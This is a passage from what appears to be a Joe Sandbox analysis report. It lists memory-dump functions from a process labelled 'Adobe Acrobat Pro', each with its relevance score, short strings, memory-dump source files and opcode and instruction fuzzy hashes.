Opcode Fuzzy Hash: ef4ffa65407e45edf435a4271980b8d4fc6ebbdb56d83feee7af74fb498b18fa
Instruction Fuzzy Hash: 7F514435204B138BD329DB29D5504EAB3D2FFC8311B90872D94968B698EB70A41ADBC5

Uniqueness

Uniqueness Score: -1.00%

Function 1CC9719B Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

*;T, xrefs: 1CC97388

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: *;T
API String ID: 0-1699913383
Opcode ID: efff19606582497e09dea74d0a4155e9b65021fbdf8ba8ec0fcc0c55c62417df
Instruction ID: e428bf25dd4cee5da7fbdeb41c4577136eee5291e1622691bd3437eae49b2cf5
Opcode Fuzzy Hash: efff19606582497e09dea74d0a4155e9b65021fbdf8ba8ec0fcc0c55c62417df
Instruction Fuzzy Hash: BA5177741082568BD325EF7CE5904EEBBE1EFDA310F20996EC0D2C75D5DA364A16CB06

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBE454 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

E, xrefs: 1ADBE5DB

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: E
API String ID: 0-3568589458
Opcode ID: 52d72fb136bf1fc47d95975a40fa8ad92285f9421fe3218dd81bb9ab635aa5f5
Instruction ID: ec9fb8bc9e1bcdadaec44b262beaacfc762ed6f45a3da854702c85b0efdcf881
Opcode Fuzzy Hash: 52d72fb136bf1fc47d95975a40fa8ad92285f9421fe3218dd81bb9ab635aa5f5
Instruction Fuzzy Hash: 245126382087518BC718DF28E5918ABF7E2EFD8300F648D6DD486C72D5EB75A916CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A6DAE Relevance: 1.4, Strings: 1, Instructions: 125COMMON

Download Yara Rule

Strings

!, xrefs: 1B3A6F8D

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: 60d3316cca54b0fd2ce15787846c95ebce94845550578281b7d58fae575b9b46
Instruction ID: 5a2a1f37a9d17ac083c98918bfdd0037e7ba7d62e600afb30eb10a1dda6a2632
Opcode Fuzzy Hash: 60d3316cca54b0fd2ce15787846c95ebce94845550578281b7d58fae575b9b46
Instruction Fuzzy Hash: 6B41657111C7428BC718EF28E4504DBB7E1FFCA315F649AADD4CA8B196E338901ADB46

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B972F Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

o, xrefs: 1B3B975E

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: o
API String ID: 0-252678980
Opcode ID: 47ba0eb0d9aaead1982a9654d85331399f36338d0f893242f6d4a446d2c2fb4a
Instruction ID: 8866ce2ba27f7a754232e9af89f562a1b798c5496e7c2ef4d704a75e3ddf029a
Opcode Fuzzy Hash: 47ba0eb0d9aaead1982a9654d85331399f36338d0f893242f6d4a446d2c2fb4a
Instruction Fuzzy Hash: 4641A9781087418BC71CEF38E4A14EBB7E1EBC9304F99DA2D9492C71D6DB35A41ADB02

Uniqueness

Uniqueness Score: -1.00%

Function 1D050597 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

%, xrefs: 1D0505D5

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001D050000.00000020.00000001.01000000.00000004.sdmp, Offset: 1D050000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d050000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: %
API String ID: 0-2567322570
Opcode ID: 085773bbcc0e9c2b7337321fb6745df4675512efe54e166f15d53907f475e702
Instruction ID: 7ab367c21f0019e6cada09648c1139325c04a54c90df2e05694a22c17da82f69
Opcode Fuzzy Hash: 085773bbcc0e9c2b7337321fb6745df4675512efe54e166f15d53907f475e702
Instruction Fuzzy Hash: DE412434A1C7565BD318EF64D9845EFB3E6FFD1301F10C92E84C397050DA70A61ACA8A

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A07B0 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

9, xrefs: 1B3A097D

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: 9
API String ID: 0-2366072709
Opcode ID: dbc786680fa9c3642e38a44c66fd6462b7d9e5316e7ffb468193e142c715433c
Instruction ID: ad7c92ef55e5b4063b1932723bdfb24f2b8cdde3b0756101c254b016f6811df8
Opcode Fuzzy Hash: dbc786680fa9c3642e38a44c66fd6462b7d9e5316e7ffb468193e142c715433c
Instruction Fuzzy Hash: C14196395087168BC304EF34D4941EAB7F0EFC5300F248AADC4EA8B096E770A559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBCBAE Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

> , xrefs: 1ADBCC65

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: >
API String ID: 0-997337418
Opcode ID: 6b5b22cfe6aadb17bce1aec79a8759962b7bc3b0dedd912d20d9e5e94a878c6e
Instruction ID: d06d5a044611fd4dee43058877dc127a11a6520f437c8c4f86eff22054cf1821
Opcode Fuzzy Hash: 6b5b22cfe6aadb17bce1aec79a8759962b7bc3b0dedd912d20d9e5e94a878c6e
Instruction Fuzzy Hash: BB415435109B428BC715EB28D4809EBB7E2FFC9320F918F6DD0964B695DB30A406DB42

Uniqueness

Uniqueness Score: -1.00%

Function 1CCA0F23 Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

q, xrefs: 1CCA1076

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: q
API String ID: 0-4110462503
Opcode ID: c86780a258c80306979eb9d0ddf905a86494e7628cc8a48723788f286f920b62
Instruction ID: 04c7d2e284ca7bd12bbc898c9b360249f4d97c3a75beca7a998f8c4d1ee27cd2
Opcode Fuzzy Hash: c86780a258c80306979eb9d0ddf905a86494e7628cc8a48723788f286f920b62
Instruction Fuzzy Hash: 354125792087128FD319DF38D4914EBBBE2EFD6320F149A6C9099870D5DB75600ECB56

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C37C8 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

L, xrefs: 1B3C3843

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: L
API String ID: 0-2909332022
Opcode ID: 727f6028152a446fe9ef0f84c4367b0652f5728c1cdb460c104fd29b5c69ea1a
Instruction ID: 5af05eef692248b8bf5e778b5c510599e6fe61687473dfe23b33a29f164b43c1
Opcode Fuzzy Hash: 727f6028152a446fe9ef0f84c4367b0652f5728c1cdb460c104fd29b5c69ea1a
Instruction Fuzzy Hash: 0741E93440C3D28BCB09EB38D0A10EA73E1EFD6310F609AADD4D6832C1E778611ADB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C5E0C Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

"J*~, xrefs: 1B3C5E5F

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "J*~
API String ID: 0-2393120940
Opcode ID: 4a707965598976f52c80a52ff6f85796c568882b30204c794116e15537ea3182
Instruction ID: 96c2d68007c961284b2474e15c2eda1f93b0fe6d841aea6c4b69e74e415dce21
Opcode Fuzzy Hash: 4a707965598976f52c80a52ff6f85796c568882b30204c794116e15537ea3182
Instruction Fuzzy Hash: 7F414A75205A028FD718DF28E8904EAB3F2FFC5325F20996CD09A8B2C5E739A507DB45

Uniqueness

Uniqueness Score: -1.00%

Function 1C70CF50 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

g, xrefs: 1C70CFCA

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001C70C000.00000020.00000001.01000000.00000004.sdmp, Offset: 1C70C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1c70c000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: cf73d4960f2c9562ce216d33bc5adc831fbfcc8c6950f03ed9563fad8ba6e604
Instruction ID: 0a90c56df25697e4a74178046075eb8451c88a4a1d0e5f23a76fd4565e320c6c
Opcode Fuzzy Hash: cf73d4960f2c9562ce216d33bc5adc831fbfcc8c6950f03ed9563fad8ba6e604
Instruction Fuzzy Hash: 8531393241CE0A8B8B1CEE55E4C50BAB392E7E1325B60976ECD97C64E6DA319126C2C5

Uniqueness

Uniqueness Score: -1.00%

Function 1CC0EDB0 Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

G, xrefs: 1CC0EE38

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 718ee4500c83cd5d00ea87dfc42623e20322706323ea8aeb415775da1aacbd2f
Instruction ID: f13193fca44b505bb597a489e0666c9302fc7e6a0e72cb51c04a2ae611bfca07
Opcode Fuzzy Hash: 718ee4500c83cd5d00ea87dfc42623e20322706323ea8aeb415775da1aacbd2f
Instruction Fuzzy Hash: FC41A9792182124BEB18EB38D8514FB77F2EFC5300F50867D9096CF689DA359A0A8B44

Uniqueness

Uniqueness Score: -1.00%

Function 1B392570 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

O, xrefs: 1B3ABDC2

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: b1268b7814e4f79d8828fefdcd61995f8791fc247780628caaf47c6bc904c202
Instruction ID: 1f4091f04b18c166763357356fcd8c798ac67cea1d76a1c1d5c8ce434142a90b
Opcode Fuzzy Hash: b1268b7814e4f79d8828fefdcd61995f8791fc247780628caaf47c6bc904c202
Instruction Fuzzy Hash: 86415735118B434BD708FF28D4904EAB3B2FFD5361B518A2ED0A6CB5E4E735622ADB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3AAE1C Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

g, xrefs: 1B3AAF15

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 0f0b8288afb3f15ad1e721925607f745adf18065260330e2898dfa466e920fea
Instruction ID: 96c6711433cee285532335789fd6759195cb1f210aac5d8d1a3dfb71a4cf76fc
Opcode Fuzzy Hash: 0f0b8288afb3f15ad1e721925607f745adf18065260330e2898dfa466e920fea
Instruction Fuzzy Hash: D34133381087418BD319EB2CE4411ABB7E2EFC5321F609AADC0DA876A9DF356117CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A6BD6 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

d, xrefs: 1B3A6CC0

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: b448e6f029f59ef0d268b2051860f94699f79dad78e97ea77e76af9fe96b0da2
Instruction ID: 7909783d74591ddcd0875c8f36b6d912644861f367c0fc57ae25a2dbd72abc2d
Opcode Fuzzy Hash: b448e6f029f59ef0d268b2051860f94699f79dad78e97ea77e76af9fe96b0da2
Instruction Fuzzy Hash: 594113790187028BD318EF2DD88059AB7E6FBC5310F60CA3EC596CB5D5DB755056CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1AD61BDC Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

U, xrefs: 1AD71ADF

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001AD5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1AD5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ad5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: 0c0afba7f8781491dd6d8c11c6b1ea1d7f2719f1b1eb545cb1b8a23632284e73
Instruction ID: a6b691e6382e43912f8f1311110d1ac7f5580204a36f9e6d6f91a641f78a527f
Opcode Fuzzy Hash: 0c0afba7f8781491dd6d8c11c6b1ea1d7f2719f1b1eb545cb1b8a23632284e73
Instruction Fuzzy Hash: E24157350087428BC308DF28D0954BEB3E1FFC5320F24CA6ED49A8B695E738A45ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 1B3A9C27 Relevance: 1.4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

Strings

0, xrefs: 1B3A9D90

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-2774322534
Opcode ID: 9937bfe8acf9e397bfa96f3a5334e2ef778d6a7d0c9c1912e8ba754c4ee5779b
Instruction ID: 500e866e8f53fc7d2f5183a3c6a2cf3b27f921f13150ceb362bfcf50c431d710
Opcode Fuzzy Hash: 9937bfe8acf9e397bfa96f3a5334e2ef778d6a7d0c9c1912e8ba754c4ee5779b
Instruction Fuzzy Hash: 034146385082478FC71CDF28E0914EA77E2FFC8364F548ABEC49987A94DB35A51ACB44

Uniqueness

Uniqueness Score: -1.00%

Function 1CC07A37 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

v, xrefs: 1CC07B6E

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: v
API String ID: 0-1801730948
Opcode ID: cd2163ea084efa5c87d6ed07f8633600d4e9b500ead9949203e16051718ec6d8
Instruction ID: f471d371608af8a29912a1e80695befc22b561130e222d603124940ffd52a032
Opcode Fuzzy Hash: cd2163ea084efa5c87d6ed07f8633600d4e9b500ead9949203e16051718ec6d8
Instruction Fuzzy Hash: AD4134762086138BD719DE69D1A15AAB3E2EBD0321F608A3EC0C287298DB75201ACB45

Uniqueness

Uniqueness Score: -1.00%

Function 1ADB2768 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

F, xrefs: 1ADB28CC

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: F
API String ID: 0-1304234792
Opcode ID: 68eed9ce9c96ed6946a5be4ddc616479947bb1958f8c511f8fd60d8e6b558a98
Instruction ID: f42eddefa15943d26707897b717d9d9478b0bd1e7c047b9fc9c14bac721125a1
Opcode Fuzzy Hash: 68eed9ce9c96ed6946a5be4ddc616479947bb1958f8c511f8fd60d8e6b558a98
Instruction Fuzzy Hash: D341143561C7438BD318EB39D88086BB3D1FBC9360B248F7DC5A6875D8DB34A516CA45

Uniqueness

Uniqueness Score: -1.00%

Function 1CEDE855 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

g, xrefs: 1CEDE93F

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 4009b7182a9713fc3c66e7b87998e84384176f4ecce71e4d8203df55a0986604
Instruction ID: 4581157f8f59430b8361d952c1a4aeb89118c64b208a0f1d9d4f6c8865caf0c2
Opcode Fuzzy Hash: 4009b7182a9713fc3c66e7b87998e84384176f4ecce71e4d8203df55a0986604
Instruction Fuzzy Hash: 7341F33901C7528ED314EF78E4902AAB7E1EFD1324F145A7EC0E587691DB30501ECB12

Uniqueness

Uniqueness Score: -1.00%

Function 1A7615AD Relevance: 1.4, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

g, xrefs: 1A761696

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001A73D000.00000020.00000001.01000000.00000004.sdmp, Offset: 1A73D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1a73d000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 5631b5ba80e81432c57571d504561fd806a45dc5b3a9475e90b78470266a577d
Instruction ID: 302c246032bf077a6453360ef7c8840c0db4d61769c11f2cb71a38ec50aeb070
Opcode Fuzzy Hash: 5631b5ba80e81432c57571d504561fd806a45dc5b3a9475e90b78470266a577d
Instruction Fuzzy Hash: 2B31BA342087834BDB1DDF78D8661BB77D2ABC6320F585B7E9493C75E2DE6A000A8701

Uniqueness

Uniqueness Score: -1.00%

Function 1CB5F9A0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

l, xrefs: 1CB5FA02

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CB5F000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CB5F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cb5f000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: l
API String ID: 0-2517025534
Opcode ID: d9f6d236e75e49c21a70ef7cf47ada0d35fd2eb221129ea107764c4f45c41df8
Instruction ID: 9042006803e4e70f679915c983c9278ed11df90c1cfe242be41cb74690f7b7cb
Opcode Fuzzy Hash: d9f6d236e75e49c21a70ef7cf47ada0d35fd2eb221129ea107764c4f45c41df8
Instruction Fuzzy Hash: B43155366087024BD72CDF78E84556A77E2ABC8311B54C73D908ACB5D4EE755029CA0A

Uniqueness

Uniqueness Score: -1.00%

Function 1CEE1CF8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

g, xrefs: 1CEE1DD1

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: g
API String ID: 0-30677878
Opcode ID: 0c7d4abb16fbd9cf24af93a2bdf2637a3628219fc7012e31bbbd424db4efd03a
Instruction ID: 1a621c749dde8f6c87c73c4ea9e29ab7bc3354bdc9ef00a4e629d886761cfc77
Opcode Fuzzy Hash: 0c7d4abb16fbd9cf24af93a2bdf2637a3628219fc7012e31bbbd424db4efd03a
Instruction Fuzzy Hash: F641363590C7028FD71AEF28D0808DAB7E1FFD5314F204A6D80868B589DB70B41ACB98

Uniqueness

Uniqueness Score: -1.00%

Function 1CC01D1D Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

#, xrefs: 1CC01E48

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: c2938793dd57d156cce28caa4257ca56ac8e6be50bfb85a547c19fc076c319cf
Instruction ID: ce7a422553d8b9d003deb22f1f40b978ad1efffeb08aba942b063bff7b366a87
Opcode Fuzzy Hash: c2938793dd57d156cce28caa4257ca56ac8e6be50bfb85a547c19fc076c319cf
Instruction Fuzzy Hash: C931767260CB026FD709DB39E4004DAB3E2EFC6310B60CB3ED484C7599DA34A55ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 1B3B5F72 Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

$, xrefs: 1B3B60A7

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-3993045852
Opcode ID: 0e107932605d2b53eee426daf5ed8cf143e4daac28c3daad1a273f7b85a6e20e
Instruction ID: a07d182ca291fb78911e82e9fa4b1724b9c210793bcc52c5df066b4810d9838f
Opcode Fuzzy Hash: 0e107932605d2b53eee426daf5ed8cf143e4daac28c3daad1a273f7b85a6e20e
Instruction Fuzzy Hash: 9F31013A50C7168BD318EF69A4504AFB7E1EFC9321F65C93ED489CB294E7789106CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1CC0D9E8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

#U, xrefs: 1CC0DA5B

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC01000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc01000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: #U
API String ID: 0-3832660197
Opcode ID: a898f9e9f09b2b909f3154bce82f6f5c2fa09e75eff845df432db6fe41226ad3
Instruction ID: 012a7b78fcf4acfcd0d2f76e38d15c31cc32bcdeca54d0cee931fc960983f15e
Opcode Fuzzy Hash: a898f9e9f09b2b909f3154bce82f6f5c2fa09e75eff845df432db6fe41226ad3
Instruction Fuzzy Hash: 453146322187068BC319EF39D8509ABB3E1FFC5714F64867DD48AC7584E779891ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 1CEDC2A5 Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

G, xrefs: 1CEDC2C9

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CED7000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CED7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1ced7000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: G
API String ID: 0-985283518
Opcode ID: 4bee86d948f1716091f97d6e064b6fcd570a68e48c7579ee2064efd4d55ff8ee
Instruction ID: 3390dab03785860416de4062c64cebc01bdddba53ab97bf9a58be6e6c9da7e62
Opcode Fuzzy Hash: 4bee86d948f1716091f97d6e064b6fcd570a68e48c7579ee2064efd4d55ff8ee
Instruction Fuzzy Hash: 3831BC2921C79247D314BB38D4500FABBD1EFCA321F548B9ED0E6C71D2D718920AD719

Uniqueness

Uniqueness Score: -1.00%

Function 1CC98695 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

", xrefs: 1CC9875D

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: a33f5f7a312b8aa402ce8838fff61af0f7fa2a759602edcd2d9b0f586441938e
Instruction ID: 2e36271b7bfc2350b1d2480c676822694dc672e4945a19149ea24e6cb9c27fac
Opcode Fuzzy Hash: a33f5f7a312b8aa402ce8838fff61af0f7fa2a759602edcd2d9b0f586441938e
Instruction Fuzzy Hash: E03136211087534AC709EB7C94945BBB7E2EF89320F6486BDD1AAC31D6EA7A510ACF44

Uniqueness

Uniqueness Score: -1.00%

Function 1ADBAD14 Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

M, xrefs: 1ADBADBF

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001ADAF000.00000020.00000001.01000000.00000004.sdmp, Offset: 1ADAF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1adaf000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 1bacef25371ef23de820095e10efb2f2cfaae04d4695a0a5863233ae4c7942f4
Instruction ID: af949a399ffa5af04f6041c0e2aa6db6e556e9901b789ec58c1a8946067e9991
Opcode Fuzzy Hash: 1bacef25371ef23de820095e10efb2f2cfaae04d4695a0a5863233ae4c7942f4
Instruction Fuzzy Hash: 1A313438114A1B4BC325EF28D0904BBB3E1FFE9312F614A7DC0C28B199E729555ADF80

Uniqueness

Uniqueness Score: -1.00%

Function 1CC9F20A Relevance: 1.3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

M, xrefs: 1CC9F32F

Memory Dump Source

Source File: 00000008.00000002.2750172159.000000001CC95000.00000020.00000001.01000000.00000004.sdmp, Offset: 1CC95000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cc95000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9d3741de492eeae344d24c200f1fc2c178e36ab15cc9774f54194e8e49bc7312
Instruction ID: 8f752dc511285cd8573b6b8ca6356d3d84ff4af9c76e1bfcd436646e8069e19e
Opcode Fuzzy Hash: 9d3741de492eeae344d24c200f1fc2c178e36ab15cc9774f54194e8e49bc7312
Instruction Fuzzy Hash: BD3166351087458BDB28EFA8D4A45EFBBE0EBD6308F51966ED091C72D1DB38910ADB05

Uniqueness

Uniqueness Score: -1.00%

Function 1B3C85C8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

Q, xrefs: 1B3C864F

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: Q
API String ID: 0-3463352047
Opcode ID: 8f22a142365870ee905bf9d6884667b4c851496652e3d04189ceb92d662438c1
Instruction ID: c6ddc4ab5a7c3379b8e79060adef19ef0d2f8cd9dfa8729ed1e8819fe153d891
Opcode Fuzzy Hash: 8f22a142365870ee905bf9d6884667b4c851496652e3d04189ceb92d662438c1
Instruction Fuzzy Hash: CD3148391083528BC705EF38D8624EBB7E1FF86304F55896ED48687591FB395519DF02

Uniqueness

Uniqueness Score: -1.00%

Function 1B393076 Relevance: 1.3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

B, xrefs: 1B393098

Memory Dump Source

Source File: 00000008.00000002.2538328558.000000001B392000.00000020.00000001.01000000.00000004.sdmp, Offset: 1B392000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1b392000_Adobe Acrobat Pro.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: ee890d22f87ab5a9ac0505d1dbddd72c065b08946b3bbb98860c1b572b7bab74
